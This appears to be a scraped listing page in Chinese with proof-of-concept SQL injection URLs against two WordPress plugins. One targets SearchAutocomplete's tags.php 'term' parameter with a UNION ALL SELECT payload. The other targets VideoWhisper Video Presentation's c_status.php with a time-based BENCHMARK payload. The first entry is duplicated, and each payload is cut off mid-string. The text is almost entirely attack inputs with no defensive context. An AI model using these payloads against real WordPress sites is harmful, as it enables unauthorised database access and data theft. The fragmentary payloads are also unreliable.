WordPress SearchAutocomplete 插件
PoC
http://www.site.com/wp-content/plugins/search-autocomplete/includes/tags.php?term=-1' UNION ALL SELECT CONCAT_WS(CHAR(44),version(),cu......
WordPress SearchAutocomplete 插件
PoC
http://www.site.com/wp-content/plugins/search-autocomplete/includes/tags.php?term=-1' UNION ALL SELECT CONCAT_WS(CHAR(44),version(),cu......
WordPress VideoWhisper 视频演示插件
http://www.site.com/wp-content/plugins/videowhisper-video-presentation/vp/c_status.php s=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,10......